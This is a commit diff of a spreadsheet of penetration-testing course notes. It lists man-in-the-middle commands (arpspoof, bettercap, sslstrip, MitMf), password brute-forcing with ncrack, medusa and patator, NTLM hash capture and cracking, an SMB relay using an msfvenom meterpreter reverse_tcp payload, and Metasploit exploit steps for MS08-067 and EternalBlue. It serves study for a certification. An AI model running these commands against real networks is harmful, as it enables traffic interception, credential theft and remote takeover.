<commit_message>
Add and repair about Exploitation
</commit_message>
<xml_diff>
--- a/ECPPT/network-security/Tools-List.xlsx
+++ b/ECPPT/network-security/Tools-List.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="D:\Workbench\ecppt-notes-master\ECPPT\network-security\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{CA499667-2BB0-4EBE-87C9-5EE21E1722DD}" xr6:coauthVersionLast="37" xr6:coauthVersionMax="37" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{077FC78B-CEDD-403E-B6AB-F6064C2A3E6D}" xr6:coauthVersionLast="37" xr6:coauthVersionMax="37" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="0" windowWidth="20400" windowHeight="8130" tabRatio="636" activeTab="3" xr2:uid="{FAAFF2C1-7EB6-464B-8383-4BCAECFF30B1}"/>
+    <workbookView xWindow="0" yWindow="0" windowWidth="20400" windowHeight="8130" tabRatio="893" firstSheet="3" activeTab="4" xr2:uid="{FAAFF2C1-7EB6-464B-8383-4BCAECFF30B1}"/>
   </bookViews>
   <sheets>
     <sheet name="Information Gain" sheetId="1" r:id="rId1"/>
@@ -30,7 +30,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="396" uniqueCount="292">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="657" uniqueCount="533">
   <si>
     <t>Tools List</t>
   </si>
@@ -906,6 +906,729 @@
   </si>
   <si>
     <t>All (.py)</t>
+  </si>
+  <si>
+    <t>ettercap -G</t>
+  </si>
+  <si>
+    <t>Show GUI</t>
+  </si>
+  <si>
+    <t>macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-i interface ] [-n times]</t>
+  </si>
+  <si>
+    <t>arp -a</t>
+  </si>
+  <si>
+    <t>Check arp table</t>
+  </si>
+  <si>
+    <t>See all traffic in our interface</t>
+  </si>
+  <si>
+    <t>-s 0</t>
+  </si>
+  <si>
+    <t>-dst</t>
+  </si>
+  <si>
+    <t>-A</t>
+  </si>
+  <si>
+    <t>-XX</t>
+  </si>
+  <si>
+    <t>-xx</t>
+  </si>
+  <si>
+    <t>-S</t>
+  </si>
+  <si>
+    <t>-s</t>
+  </si>
+  <si>
+    <t>we set the MTU size to 0, in order to get the entire packet</t>
+  </si>
+  <si>
+    <t>Shows only the communications with the destination specified</t>
+  </si>
+  <si>
+    <t>Print each packet (minus its link level header) in ACII</t>
+  </si>
+  <si>
+    <t>When parsing and printing, in addition to printing the headers of each packet, print the data of each packet including its link level header, in hex</t>
+  </si>
+  <si>
+    <t>When parsing and printing, in addition to printing the headers of each packet, print the data of each packet, including its link level header, in hex</t>
+  </si>
+  <si>
+    <t>Print absolute, rather than relative, TCP sequence numbers</t>
+  </si>
+  <si>
+    <t>Snaf snaplen, bytes of data from each packet rather than the default of 68</t>
+  </si>
+  <si>
+    <t>echo 1 &gt; /proc/sys/net/ipv4/ip_forward</t>
+  </si>
+  <si>
+    <t>enable port forwarding</t>
+  </si>
+  <si>
+    <t>&lt;spoofed_IP&gt; is the IP we wish to spoof as us</t>
+  </si>
+  <si>
+    <t>-G</t>
+  </si>
+  <si>
+    <t>-I</t>
+  </si>
+  <si>
+    <t>-T</t>
+  </si>
+  <si>
+    <t>-</t>
+  </si>
+  <si>
+    <t>-O</t>
+  </si>
+  <si>
+    <t>-D</t>
+  </si>
+  <si>
+    <t>-L</t>
+  </si>
+  <si>
+    <t>-X</t>
+  </si>
+  <si>
+    <t>-P</t>
+  </si>
+  <si>
+    <t>--gateway ADDRESS</t>
+  </si>
+  <si>
+    <t>--interface IFACE</t>
+  </si>
+  <si>
+    <t>--spoofer NAME</t>
+  </si>
+  <si>
+    <t>--target ADDRESS1.address2</t>
+  </si>
+  <si>
+    <t>--ignore ADDRESS1.address2</t>
+  </si>
+  <si>
+    <t>--log LOG_FILE</t>
+  </si>
+  <si>
+    <t>--debug</t>
+  </si>
+  <si>
+    <t>--local</t>
+  </si>
+  <si>
+    <t>--sniffer</t>
+  </si>
+  <si>
+    <t>--parser</t>
+  </si>
+  <si>
+    <t>Manually specify gateway address</t>
+  </si>
+  <si>
+    <t>Network interface name</t>
+  </si>
+  <si>
+    <t>Spoofer module to use</t>
+  </si>
+  <si>
+    <t>Target IP address</t>
+  </si>
+  <si>
+    <t>Ignore addresses if founf</t>
+  </si>
+  <si>
+    <t>Log all messages into a file</t>
+  </si>
+  <si>
+    <t>Enable debug logging</t>
+  </si>
+  <si>
+    <t>Parse packets from/to the address of this PC</t>
+  </si>
+  <si>
+    <t>Enable sniffer</t>
+  </si>
+  <si>
+    <t>Enable parser</t>
+  </si>
+  <si>
+    <t>--no-spoofing</t>
+  </si>
+  <si>
+    <t>Disable spoofing</t>
+  </si>
+  <si>
+    <t>bettercap -G 192.168.102.2 -T 192.168.102.135 --proxy-https</t>
+  </si>
+  <si>
+    <t>bettercap -I tap0 -T 172.16.5.15 -X -P "HTTPAUTH,URL,FTP,POST"</t>
+  </si>
+  <si>
+    <t>iptables -t net -A PREROUTING -p top --destination-port 80 -j REDIRECT --to-port 8080</t>
+  </si>
+  <si>
+    <t>sslstrip -a -f -l 8080 -w els_sslt</t>
+  </si>
+  <si>
+    <t>-p</t>
+  </si>
+  <si>
+    <t>-a</t>
+  </si>
+  <si>
+    <t>-f</t>
+  </si>
+  <si>
+    <t>-k</t>
+  </si>
+  <si>
+    <t>-h</t>
+  </si>
+  <si>
+    <t>-l &lt;port&gt;</t>
+  </si>
+  <si>
+    <t>--port</t>
+  </si>
+  <si>
+    <t>--ssl</t>
+  </si>
+  <si>
+    <t>--all</t>
+  </si>
+  <si>
+    <t>--listen=&lt;port&gt;</t>
+  </si>
+  <si>
+    <t>--favicon</t>
+  </si>
+  <si>
+    <t>--killsessions</t>
+  </si>
+  <si>
+    <t xml:space="preserve">-w &lt;filename&gt; </t>
+  </si>
+  <si>
+    <t>--write=&lt;filename&gt;</t>
+  </si>
+  <si>
+    <t>Specify file to log to (optional)</t>
+  </si>
+  <si>
+    <t>Log only SSL Ports (default)</t>
+  </si>
+  <si>
+    <t>Log all SSL traffic to and from server</t>
+  </si>
+  <si>
+    <t>Log all SSL and HTTP traffic to and from server</t>
+  </si>
+  <si>
+    <t>Port to listenn on (default 10000)</t>
+  </si>
+  <si>
+    <t>Substitute a lock favicon on secure requests</t>
+  </si>
+  <si>
+    <t>Kill sessions in progress</t>
+  </si>
+  <si>
+    <t>Help</t>
+  </si>
+  <si>
+    <t>Enable port forwarfing</t>
+  </si>
+  <si>
+    <t>Set up port redirection using iptables</t>
+  </si>
+  <si>
+    <t>MitMf</t>
+  </si>
+  <si>
+    <t>python mitm.py -h</t>
+  </si>
+  <si>
+    <t>--spoof</t>
+  </si>
+  <si>
+    <t>--arp</t>
+  </si>
+  <si>
+    <t>--dns</t>
+  </si>
+  <si>
+    <t>--hsts</t>
+  </si>
+  <si>
+    <t>--gateway</t>
+  </si>
+  <si>
+    <t>--targets</t>
+  </si>
+  <si>
+    <t>-i</t>
+  </si>
+  <si>
+    <t>Interface to listen on</t>
+  </si>
+  <si>
+    <t>Load plugin 'Spoof' - This allows to redirect traffic using ARP, ICMP, DHCP, or DNS spoofing</t>
+  </si>
+  <si>
+    <t>Redirect traffci using ARP spoofing</t>
+  </si>
+  <si>
+    <t>Proxy/Modify DNS queries</t>
+  </si>
+  <si>
+    <t>Load plugin 'SSLstrip+'</t>
+  </si>
+  <si>
+    <t>Specify the gateeway IP</t>
+  </si>
+  <si>
+    <t>Specify the host/s to poison (if omitted, default to subnet)</t>
+  </si>
+  <si>
+    <t>python mitmf.py -i eth0 --spoof --arp --dns --hsts --gateway 192.168.102.2 --targets 192.168.102.149</t>
+  </si>
+  <si>
+    <t>tcpdump -i eth0</t>
+  </si>
+  <si>
+    <t>tcpdump -i eth0 -vvvASs 0 dst 192.168.102.139</t>
+  </si>
+  <si>
+    <t>arpspoof -i tap0 -t &lt;attacked_IP&gt; &lt;spoofed_IP&gt;</t>
+  </si>
+  <si>
+    <t>bettercap -I tap0 -G 172.16.5.1 -T 172.16.5.15</t>
+  </si>
+  <si>
+    <t>Vulnerability Scanner</t>
+  </si>
+  <si>
+    <t>Nessus</t>
+  </si>
+  <si>
+    <t>OpenVAS</t>
+  </si>
+  <si>
+    <t>Nexpose</t>
+  </si>
+  <si>
+    <t>GFI LAN Guard</t>
+  </si>
+  <si>
+    <t>http://www.tenable.com/products/nessus</t>
+  </si>
+  <si>
+    <t>http://www.openvas.org/</t>
+  </si>
+  <si>
+    <t>http://www.rapid7.com/products/nexpose/index.jsp</t>
+  </si>
+  <si>
+    <t>http://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard</t>
+  </si>
+  <si>
+    <t>Password Cracker</t>
+  </si>
+  <si>
+    <t>Ncrack</t>
+  </si>
+  <si>
+    <t>http://nmap.org/ncrack/man.html</t>
+  </si>
+  <si>
+    <t>Medusa</t>
+  </si>
+  <si>
+    <t>http://h.foofus.net/?page_id=51</t>
+  </si>
+  <si>
+    <t>Patator</t>
+  </si>
+  <si>
+    <t>Eyewitness</t>
+  </si>
+  <si>
+    <t>Rsmangler</t>
+  </si>
+  <si>
+    <t>https://github.com/lanjelot/patator</t>
+  </si>
+  <si>
+    <t>https://github.com/ChrisTruncer/EyeWitness</t>
+  </si>
+  <si>
+    <t>https://digi.ninja/projects/rsmangler.php</t>
+  </si>
+  <si>
+    <t>CeWL</t>
+  </si>
+  <si>
+    <t>MentalList</t>
+  </si>
+  <si>
+    <t>https://digi.ninja/projects/cewl.php</t>
+  </si>
+  <si>
+    <t>https://github.com/sc0tfree/mentalist</t>
+  </si>
+  <si>
+    <t>Exploitation</t>
+  </si>
+  <si>
+    <t>Metasploit</t>
+  </si>
+  <si>
+    <t>NTLM</t>
+  </si>
+  <si>
+    <t>https://msdn.microsoft.com/en-us/library/windows/desktop/aa378749(v=vs.85).aspx</t>
+  </si>
+  <si>
+    <t>Metasploit smb capture</t>
+  </si>
+  <si>
+    <t>http://www.metasploit.com/modules/auxiliary/server/capture/smb</t>
+  </si>
+  <si>
+    <t>Other</t>
+  </si>
+  <si>
+    <t>john the ripper</t>
+  </si>
+  <si>
+    <t>http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats</t>
+  </si>
+  <si>
+    <t>rcrack_mt</t>
+  </si>
+  <si>
+    <t>https://github.com/foreni-packages/rcracki_mt ; http://project-rainbowcrack.com/table.htm ; http://ophcrack.sourceforge.net/tables.php</t>
+  </si>
+  <si>
+    <t>Metasploit smb relay</t>
+  </si>
+  <si>
+    <t xml:space="preserve">           Windows Auth Weakness</t>
+  </si>
+  <si>
+    <t xml:space="preserve">           SMB</t>
+  </si>
+  <si>
+    <t>Impacket</t>
+  </si>
+  <si>
+    <t>https://github.com/coresecurity/impacket</t>
+  </si>
+  <si>
+    <t>Impacket smbrelayx.py</t>
+  </si>
+  <si>
+    <t>https://github.com/CoreSecurity/impacket/blob/e8dc587dab030787f2b2a23afebebae785e8018e/examples/smbrelayx.py</t>
+  </si>
+  <si>
+    <t>msfvenom</t>
+  </si>
+  <si>
+    <t>https://community.rapid7.com/community/metasploit/blog/2011/05/24/introducing-msfvenom</t>
+  </si>
+  <si>
+    <t>Auxiliary Module for detecting vulnerable host</t>
+  </si>
+  <si>
+    <t>Exploit Module</t>
+  </si>
+  <si>
+    <t xml:space="preserve">            EternalBlue</t>
+  </si>
+  <si>
+    <t>https://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010</t>
+  </si>
+  <si>
+    <t>https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue</t>
+  </si>
+  <si>
+    <t>firefox_pdfjs_privilege_escalation</t>
+  </si>
+  <si>
+    <t xml:space="preserve">            firefox_pdfjs_privilege_escalatio</t>
+  </si>
+  <si>
+    <t>http://www.zerodayinitiative.com/advisories/ZDI-15-110/</t>
+  </si>
+  <si>
+    <t>ncrack</t>
+  </si>
+  <si>
+    <t>ncrack ssh://10.10.10.130 telnet://10.10.10.60:218</t>
+  </si>
+  <si>
+    <t>ncrack &lt;servicename&gt;://target:&lt;port_number&gt;</t>
+  </si>
+  <si>
+    <t>ls -l /user/share/ncrack</t>
+  </si>
+  <si>
+    <t>Show files with list of common username and passwords that we can use</t>
+  </si>
+  <si>
+    <t>-P &lt;path_to_password_file_wordlist&gt;</t>
+  </si>
+  <si>
+    <t>-U &lt;path_to_username_file_wordlist&gt;</t>
+  </si>
+  <si>
+    <t>-u username1, username2, …</t>
+  </si>
+  <si>
+    <t>-p pwd1, pwd2, …</t>
+  </si>
+  <si>
+    <t>-d[0-10]</t>
+  </si>
+  <si>
+    <t>-v</t>
+  </si>
+  <si>
+    <t>--resume &lt;path&gt;</t>
+  </si>
+  <si>
+    <t>verbosity</t>
+  </si>
+  <si>
+    <t>--password-first</t>
+  </si>
+  <si>
+    <t>for debugging level</t>
+  </si>
+  <si>
+    <t>to exit once it finds valid credentials</t>
+  </si>
+  <si>
+    <t>to continue previously saved session</t>
+  </si>
+  <si>
+    <t>-o[N/X/L]</t>
+  </si>
+  <si>
+    <t>-i[N/X/L]</t>
+  </si>
+  <si>
+    <t>output the results (i.e. for nmap)</t>
+  </si>
+  <si>
+    <t>input the results (i.e. for nmap)</t>
+  </si>
+  <si>
+    <t>medusa</t>
+  </si>
+  <si>
+    <t>medusa -h 192.168.102.149 -M telnet -U username.lst -P password.lst</t>
+  </si>
+  <si>
+    <t>-h [TARGET]</t>
+  </si>
+  <si>
+    <t>-H [FILE]</t>
+  </si>
+  <si>
+    <t>-u [TARGET]</t>
+  </si>
+  <si>
+    <t>-U [FILE]</t>
+  </si>
+  <si>
+    <t>-p [TARGET]</t>
+  </si>
+  <si>
+    <t>-P [FILE]</t>
+  </si>
+  <si>
+    <t>Target hostname or IP address</t>
+  </si>
+  <si>
+    <t>File containing target hostnames or IP address</t>
+  </si>
+  <si>
+    <t>Username to test</t>
+  </si>
+  <si>
+    <t>File containing usernames to test</t>
+  </si>
+  <si>
+    <t>Password to test</t>
+  </si>
+  <si>
+    <t>File containing passwords to test</t>
+  </si>
+  <si>
+    <t>patator</t>
+  </si>
+  <si>
+    <t>patator &lt;module_name&gt; ---help</t>
+  </si>
+  <si>
+    <t>Show how to operate a module</t>
+  </si>
+  <si>
+    <t>patator ssh_login host=192.168.102.155 user=FILE0 password=FILE1 0=username.lst 1=password.lst -x ignore:mesg='Authentication failed'</t>
+  </si>
+  <si>
+    <t>EyeWitness</t>
+  </si>
+  <si>
+    <t>/tools/EyeWitness/setup# ./setup.sh</t>
+  </si>
+  <si>
+    <t>installing</t>
+  </si>
+  <si>
+    <t>python EyeWitness.py --headless --prepend-https -f urls.txt</t>
+  </si>
+  <si>
+    <t>scanning</t>
+  </si>
+  <si>
+    <t>--active-scan</t>
+  </si>
+  <si>
+    <t>logs into any and all devices found using known default credentials</t>
+  </si>
+  <si>
+    <t>rsmangler</t>
+  </si>
+  <si>
+    <t>cat words.txt | rsmangler --file - &gt; words_new.txt</t>
+  </si>
+  <si>
+    <t>Generate wordlist</t>
+  </si>
+  <si>
+    <t>cewl -m 8 http://www.google.com</t>
+  </si>
+  <si>
+    <t>scrape google.com and generate 8 character keywords</t>
+  </si>
+  <si>
+    <t>msf auxiliary[smb] &gt; use auxiliary/server/capture/smb</t>
+  </si>
+  <si>
+    <t>msf auxiliary[smb] &gt; show options</t>
+  </si>
+  <si>
+    <t>msf auxiliary[smb] &gt; run</t>
+  </si>
+  <si>
+    <t>cat hashpwd_netntlm</t>
+  </si>
+  <si>
+    <t>The hashes are saved in this file</t>
+  </si>
+  <si>
+    <t>john --format-netlm hashpwd_netntlm</t>
+  </si>
+  <si>
+    <t>rcracki_mt -h 1f548398f0f49ea1 -t 4 *.rti</t>
+  </si>
+  <si>
+    <t>-t : number of threads to use ; *.rti : path of the downloaded rainbow table</t>
+  </si>
+  <si>
+    <t>Feed to john the ripper or ncrack_mt</t>
+  </si>
+  <si>
+    <t>ruby halflm_second.rb -n 1f548398f0f49ea18e2f0dcb9562b75eaa32e75aebf1d69c -p ELSPWD1</t>
+  </si>
+  <si>
+    <t>ELSPWD : the first half of the password</t>
+  </si>
+  <si>
+    <t>, then /metasploit-framwork/data/john/run.linux.x64.mmx# perl netntlm.pl (to determine uppercase)</t>
+  </si>
+  <si>
+    <t>perl netntlm.pl -file /root/hashpwd_netntlm -seed ELSPWD123</t>
+  </si>
+  <si>
+    <t>, then (or directly to netntlm.pl) metasploit-framework/tools/password/halflm_second.rb (to get the latter half)</t>
+  </si>
+  <si>
+    <t>perl netntlm.pl -file /root/hashpwd_netntlm -seed ELSPWD1</t>
+  </si>
+  <si>
+    <t>Detemine uppercaseness only</t>
+  </si>
+  <si>
+    <t>Determine both latter half of pass and uppercaseness</t>
+  </si>
+  <si>
+    <t>msf exploit(smb_relay) &gt; show options</t>
+  </si>
+  <si>
+    <t>msf exploit(smb_relay) &gt; sessions</t>
+  </si>
+  <si>
+    <t>Relay (reuse) detected sessions</t>
+  </si>
+  <si>
+    <t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.102.147 LPORT=4455 -f exe -o smbexp.exe</t>
+  </si>
+  <si>
+    <t>Create payload</t>
+  </si>
+  <si>
+    <t>smbrelayx.py -h 192.168.102.149 -e /home/stduser/smbexp.exe</t>
+  </si>
+  <si>
+    <t>Create handler</t>
+  </si>
+  <si>
+    <t>Use payload through the handler</t>
+  </si>
+  <si>
+    <t>msf &gt; use exploit/multi/handler</t>
+  </si>
+  <si>
+    <t xml:space="preserve">msf &gt; run </t>
+  </si>
+  <si>
+    <t>msf &gt; use exploit/multi/browser/firefox_pdfjs_privilege_escalation</t>
+  </si>
+  <si>
+    <t>msf exploit(firefox_pdfjs_privilege_escalation) &gt; info</t>
+  </si>
+  <si>
+    <t>msf exploit(firefox_pdfjs_privilege_escalation) &gt; set payload</t>
+  </si>
+  <si>
+    <t>msf exploit(firefox_pdfjs_privilege_escalation) &gt; exploit</t>
+  </si>
+  <si>
+    <t>msf &gt; search ms08_067</t>
+  </si>
+  <si>
+    <t>search  for metasploit module</t>
+  </si>
+  <si>
+    <t>msf exploit(ms08_067_netapi) &gt; exploit</t>
+  </si>
+  <si>
+    <t>msf &gt; use exploit/windows/smb/ms08_067_netapi</t>
   </si>
 </sst>
 </file>
@@ -1183,7 +1906,7 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
     <xf numFmtId="0" fontId="4" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="54">
+  <cellXfs count="67">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
     <xf numFmtId="49" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1"/>
@@ -1221,21 +1944,6 @@
     <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1"/>
     <xf numFmtId="49" fontId="4" fillId="0" borderId="0" xfId="1" applyNumberFormat="1"/>
     <xf numFmtId="49" fontId="0" fillId="3" borderId="2" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
-    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
-    <xf numFmtId="49" fontId="3" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
-    <xf numFmtId="49" fontId="2" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
-    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
-    <xf numFmtId="49" fontId="3" fillId="5" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
     <xf numFmtId="49" fontId="4" fillId="0" borderId="8" xfId="1" applyNumberFormat="1" applyBorder="1"/>
     <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" quotePrefix="1" applyNumberFormat="1" applyBorder="1"/>
     <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyNumberFormat="1" applyAlignment="1"/>
@@ -1248,6 +1956,42 @@
     <xf numFmtId="49" fontId="0" fillId="4" borderId="14" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1"/>
     <xf numFmtId="49" fontId="0" fillId="0" borderId="14" xfId="0" applyNumberFormat="1" applyBorder="1"/>
     <xf numFmtId="49" fontId="0" fillId="0" borderId="15" xfId="0" applyNumberFormat="1" applyBorder="1"/>
+    <xf numFmtId="49" fontId="2" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="49" fontId="3" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="49" fontId="3" fillId="5" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="top"/>
+    </xf>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyNumberFormat="1" applyFill="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1"/>
+    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1"/>
+    <xf numFmtId="49" fontId="5" fillId="0" borderId="2" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
+    <xf numFmtId="49" fontId="5" fillId="0" borderId="2" xfId="1" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
   </cellXfs>
   <cellStyles count="2">
     <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
@@ -1565,7 +2309,7 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{703F7229-E1B3-4960-9AD0-CC3493B50C2A}">
   <dimension ref="A2:I93"/>
   <sheetViews>
-    <sheetView topLeftCell="A55" workbookViewId="0">
+    <sheetView workbookViewId="0">
       <selection activeCell="B25" sqref="B25"/>
     </sheetView>
   </sheetViews>
@@ -1579,11 +2323,11 @@
   </cols>
   <sheetData>
     <row r="2" spans="1:9" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="B2" s="39" t="s">
+      <c r="B2" s="49" t="s">
         <v>0</v>
       </c>
-      <c r="C2" s="39"/>
-      <c r="D2" s="39"/>
+      <c r="C2" s="49"/>
+      <c r="D2" s="49"/>
       <c r="E2" s="2"/>
       <c r="F2" s="2"/>
     </row>
@@ -1994,20 +2738,20 @@
       <c r="D39" s="15"/>
     </row>
     <row r="41" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A41" s="40" t="s">
+      <c r="A41" s="50" t="s">
         <v>68</v>
       </c>
-      <c r="B41" s="40"/>
-      <c r="C41" s="40"/>
-      <c r="D41" s="40"/>
+      <c r="B41" s="50"/>
+      <c r="C41" s="50"/>
+      <c r="D41" s="50"/>
     </row>
     <row r="42" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A42" s="38" t="s">
+      <c r="A42" s="51" t="s">
         <v>4</v>
       </c>
-      <c r="B42" s="38"/>
-      <c r="C42" s="38"/>
-      <c r="D42" s="38"/>
+      <c r="B42" s="51"/>
+      <c r="C42" s="51"/>
+      <c r="D42" s="51"/>
       <c r="E42" s="1" t="s">
         <v>69</v>
       </c>
@@ -2076,12 +2820,12 @@
       </c>
     </row>
     <row r="51" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A51" s="38" t="s">
+      <c r="A51" s="51" t="s">
         <v>43</v>
       </c>
-      <c r="B51" s="38"/>
-      <c r="C51" s="38"/>
-      <c r="D51" s="38"/>
+      <c r="B51" s="51"/>
+      <c r="C51" s="51"/>
+      <c r="D51" s="51"/>
       <c r="E51" s="1" t="s">
         <v>85</v>
       </c>
@@ -2092,12 +2836,12 @@
       </c>
     </row>
     <row r="53" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A53" s="38" t="s">
+      <c r="A53" s="51" t="s">
         <v>45</v>
       </c>
-      <c r="B53" s="38"/>
-      <c r="C53" s="38"/>
-      <c r="D53" s="38"/>
+      <c r="B53" s="51"/>
+      <c r="C53" s="51"/>
+      <c r="D53" s="51"/>
     </row>
     <row r="54" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A54" s="1" t="s">
@@ -2141,12 +2885,12 @@
       </c>
     </row>
     <row r="61" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A61" s="38" t="s">
+      <c r="A61" s="51" t="s">
         <v>46</v>
       </c>
-      <c r="B61" s="38"/>
-      <c r="C61" s="38"/>
-      <c r="D61" s="38"/>
+      <c r="B61" s="51"/>
+      <c r="C61" s="51"/>
+      <c r="D61" s="51"/>
     </row>
     <row r="62" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A62" s="1" t="s">
@@ -2172,12 +2916,12 @@
       </c>
     </row>
     <row r="66" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A66" s="38" t="s">
+      <c r="A66" s="51" t="s">
         <v>53</v>
       </c>
-      <c r="B66" s="38"/>
-      <c r="C66" s="38"/>
-      <c r="D66" s="38"/>
+      <c r="B66" s="51"/>
+      <c r="C66" s="51"/>
+      <c r="D66" s="51"/>
       <c r="E66" s="1" t="s">
         <v>105</v>
       </c>
@@ -2199,12 +2943,12 @@
       </c>
     </row>
     <row r="73" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A73" s="38" t="s">
+      <c r="A73" s="51" t="s">
         <v>106</v>
       </c>
-      <c r="B73" s="38"/>
-      <c r="C73" s="38"/>
-      <c r="D73" s="38"/>
+      <c r="B73" s="51"/>
+      <c r="C73" s="51"/>
+      <c r="D73" s="51"/>
     </row>
     <row r="74" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A74" s="1" t="s">
@@ -2233,10 +2977,10 @@
       <c r="D77" s="25"/>
     </row>
     <row r="78" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A78" s="37"/>
-      <c r="B78" s="37"/>
-      <c r="C78" s="37"/>
-      <c r="D78" s="37"/>
+      <c r="A78" s="52"/>
+      <c r="B78" s="52"/>
+      <c r="C78" s="52"/>
+      <c r="D78" s="52"/>
     </row>
     <row r="79" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A79" s="25"/>
@@ -2257,10 +3001,10 @@
       <c r="D81" s="25"/>
     </row>
     <row r="82" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A82" s="37"/>
-      <c r="B82" s="37"/>
-      <c r="C82" s="37"/>
-      <c r="D82" s="37"/>
